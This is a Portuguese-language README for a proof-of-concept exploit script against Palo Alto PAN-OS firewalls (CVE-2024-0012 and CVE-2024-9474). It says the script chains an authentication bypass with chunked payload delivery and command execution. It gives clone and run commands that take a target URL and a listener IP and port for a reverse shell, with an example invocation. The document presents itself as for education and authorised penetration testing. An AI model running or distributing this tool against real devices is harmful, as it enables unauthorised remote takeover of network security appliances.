
Este PoC tem como alvo vulnerabilidades no Palo Alto PAN-OS, especificamente CVE-2024-0012 e CVE-2024-9474. Este script automatiza o processo de exploração, incluindo criação de payload, entrega em blocos (chunked) e execução de comandos sem interrupções.
Este script de Prova de Conceito (PoC) visa vulnerabilidades no Palo Alto PAN-OS, especificamente CVE-2024-0012 e CVE-2024-9474, automatizando o processo de exploração, incluindo bypass de autenticação, criação de payload, entrega em partes (chunked) e execução perfeita de comandos.
⚠️ Este script é apenas para fins educacionais e de teste de penetração autorizado. O uso não autorizado é ilegal.
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: A URL alvo, incluindo http ou https.<LISTENER_IP>: Seu endereço IP para o listener do reverse shell.<LISTENER_PORT>: A porta para o listener do reverse shell.python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5
Obtenha a análise completa e os detalhes técnicos deste PoC neste artigo no Medium!
Este PoC destina-se apenas a fins educacionais e testes de segurança autorizados. O uso não autorizado desta ferramenta é estritamente proibido. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.